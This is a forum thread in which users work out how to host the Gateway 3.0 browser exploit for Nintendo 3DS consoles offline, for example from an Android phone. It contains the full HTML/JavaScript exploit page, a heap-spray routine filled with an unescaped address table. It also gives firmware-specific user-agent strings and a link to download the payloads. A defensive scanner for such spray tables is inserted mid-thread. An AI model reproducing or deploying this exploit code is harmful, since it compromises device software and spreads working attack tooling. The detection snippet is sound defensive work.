Hacking [Attempt] Running GW3.0 Web Exploit on a Local Network

  • Thread starter: bendrr
  • Views: 68,916
  • Replies: 198
  • Likes: 1
It's offline; you could also use your mobile hosting these files if you are not @ home ;)
I guess I would have to create a network with my mobile and share it to my 3DS, right?



Well study some 3ds html instead and put the physics away. :P haha

I'll be doing that right when I finish the unit. That's for sure :rolleyes:
 
I might try and see if I can't make an Android app which just lets you choose the sysNAND firmware and then start up a small file server + ad-hoc network where you can go to with your 3DS. Would be good in case you have to start it up on the go.


Oh, please do. You would become a lifesaver.
 
The region doesn't matter; I made a simple C# app to download all of the different payloads, and only the version string matters.

fw 2.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7412.US"
fw 2.1-3.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7498.US"
fw 4.0-4.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7455.US"
fw 5.0-7.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7552.US"
fw 7.1-9.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US"

So there are 5 different payloads.
Here are the payloads in HTML and as binary dat:
http://www.mediafire.com/download/2pd0p3htica8c4n/gateway30_payloads.7z


that's it, you are the shit! thanks
 
the .dat file is not needed.
the .dat file is only an easy way to look at the payload in binary form, it contains the decrypted string located in the javascript code

unescape("blablablablabla_I'm an encrypted payload_blablabla").

The 3DS browser only loads the javascript, not the .dat


The ability to load the exploit in offline mode would be even better (when you are on a trip, etc.)
That's probably what the 4.5 downgrade feature is for, as the 4.5 MSET exploit is still usable with gateway3.0
 
<html>
<head>
<style>
body {
color:white;
background:black;
}


</style>
<script>
function magicfun(mem, size, v) {
var a = new Array(size - 20);
nv = v + unescape("%ucccc");
for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));

mem.push(t);
}

function dsm(evnt) {
var mem = [];

for (var j = 20; j < 430; j++) {
magicfun(mem, j, unescape("\u0000\u08e0\u0004\u08e0\u0008\u08e0\u000c\u08e0\u0010\u08e0\u0014\u08e0\u0018\u08e0\u001c\u08e0\u0020\u08e0\u0024\u08e0\u0028\u08e0\u002c\u08e0\u0030\u08e0\u0034\u08e0\u0038\u08e0\u003c\u08e0\u0040\u08e0\u0044\u08e0\u0048\u08e0\u004c\u08e0\u0050\u08e0\u0054\u08e0\u0058\u08e0\u005c\u08e0\u0060\u08e0\u0064\u08e0\u0068\u08e0\u006c\u08e0\u0070\u08e0\u0074\u08e0\u0078\u08e0\u007c\u08e0\u0080\u08e0\u0084\u08e0\u0088\u08e0\u008c\u08e0\u0090\u08e0\u0094\u08e0\u0098\u08e0\u009c\u08e0\u00a0\u08e0\u00a4\u08e0\u00a8\u08e0\u00ac\u08e0\u00b0\u08e0\u00b4\u08e0\u00b8\u08e0\u00bc\u08e0\u00c0\u08e0\u00c4\u08e0\u00c8\u08e0\u00cc\u08e0\u00d0\u08e0\u00d4\u08e0\u00d8\u08e0\u00dc\u08e0\u00e0\u08e0\u00e4\u08e0\u00e8\u08e0\u00ec\u08e0\u00f0\u08e0\u00f4\u08e0\u00f8\u08e0\u00fc\u08e0\u0100\u08e0\u0104\u08e0\u0108\u08e0\u010c\u08e0\u0110\u08e0\u0114\u08e0\u0118\u08e0\u011c\u08e0\u0120\u08e0\u0124\u08e0\u0128\u08e0\u012c\u08e0\u0130\u08e0\u0134\u08e0\u0138\u08e0\u013c\u08e0\u0140\u08e0\u0144\u08e0\u0148\u08e0\u014c\u08e0\u0150\u08e0\u0154\u08e0\u0158\u08e0\u015c\u08e0\u0160\u08e0\u0164\u08e0\u0168\u08e0\u016c\u08e0\u0170\u08e0\u0174\u08e0\u0178\u08e0\u017c\u08e0\u0180\u08e0\u0184\u08e0\u0188\u08e0\u018c\u08e0\u0190\u08e0\u0194\u08e0\u0198\u08e0\u019c\u08e0\u01a0\u08e0\u01a4\u08e0\u01a8\u08e0\u01ac\u08e0\u01b0\u08e0\u01b4\u08e0\u01b8\u08e0\u01bc\u08e0\u01c0\u08e0\u01c4\u08e0\u01c8\u08e0\u01cc\u08e0\u01d0\u08e0\u01d4\u08e0\u01d8\u08e0\u01dc\u08e0\u01e0\u08e0\u01e4\u08e0\u01e8\u08e0\u01ec\u08e0\u01f0\u08e0\u01f4\u08e0\u01f8\u08e0\u01fc\u08e0"));
}
}
</script>
</head>
<body>
<h1 align="center">GATEWAY 3DS LOADING...</h1>
</body>
</html>
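
A defensive triage sketch for pages like the one posted above, as an added example that is not part of the original post or of the Gateway files: it pulls `unescape("...")` literals out of script source, reads them as little-endian 32-bit words, and flags long constant-stride runs, which is the shape of the long literal passed to `magicfun` in `dsm()`. The function names, the 16-word threshold and the sample input are assumptions made for this example.

```javascript
// Decode \uXXXX / %uXXXX escapes in a source literal into 16-bit code units.
function decodeUnits(literal) {
  const units = [];
  const re = /(?:\\u|%u)([0-9a-fA-F]{4})/g;
  let m;
  while ((m = re.exec(literal)) !== null) units.push(parseInt(m[1], 16));
  return units;
}

// Pair units into 32-bit words as a little-endian CPU reads UTF-16 text (low half first).
function toWords(units) {
  const words = [];
  for (let i = 0; i + 1 < units.length; i += 2) {
    words.push(((units[i + 1] << 16) | units[i]) >>> 0);
  }
  return words;
}

// Flag a literal that decodes to a long run of words with one constant,
// 4-byte-aligned stride (threshold of 16 words is an assumption).
function analyzeLiteral(literal, minWords = 16) {
  const words = toWords(decodeUnits(literal));
  if (words.length < minWords) return { suspicious: false, words: words.length };
  const stride = words[1] - words[0];
  const constant = words.every((w, i) => i === 0 || w - words[i - 1] === stride);
  const suspicious = constant && stride !== 0 && stride % 4 === 0;
  const base = '0x' + words[0].toString(16).padStart(8, '0');
  return { suspicious, words: words.length, base, stride };
}

// Find unescape("...") arguments in script source (escaped quotes inside the
// literal are not handled) and return the ones that look like a spray table.
function scanScript(source) {
  const findings = [];
  const re = /unescape\(\s*(["'])([^"']*)\1\s*\)/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    const result = analyzeLiteral(m[2]);
    if (result.suspicious) findings.push(result);
  }
  return findings;
}

// Constructed sample: 32 words from a made-up base 0x41410000, plus a benign call.
function buildSample(count) {
  let lit = '';
  for (let i = 0; i < count; i++) lit += '\\u' + (i * 4).toString(16).padStart(4, '0') + '\\u4141';
  return 'var s = unescape("' + lit + '"); var t = unescape("%u0041%u0042");';
}
console.log(scanScript(buildSample(32)));
```

A hit is a signal for closer review of the page, not a verdict; tune the word threshold against your own proxy or crawler data.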
 

The only thing that is missing, is a little bit scripting for detecting browser version to open different index.php.

I've to go now, maybe someone is faster than me and makes a better package including that.

androPHP is a good solution if you are not at home because you can simply open a share to the files without the need for internet :)
 
I just do this lol
[image]
 
The only thing that is missing, is a little bit scripting for detecting browser version to open different index.php.

I've to go now, maybe someone is faster than me and makes a better package including that.

androPHP is a good solution if you are not at home because you can simply open a share to the files without the need for internet :)



Can you write out a simple guide on how to host the files with androPHP?
 
I just started a web server on my android phone and connected it with mobile tethering. perfect mobile gateway solution until there is an easier solution. no need for real local network or mobile internet at all. :D
 
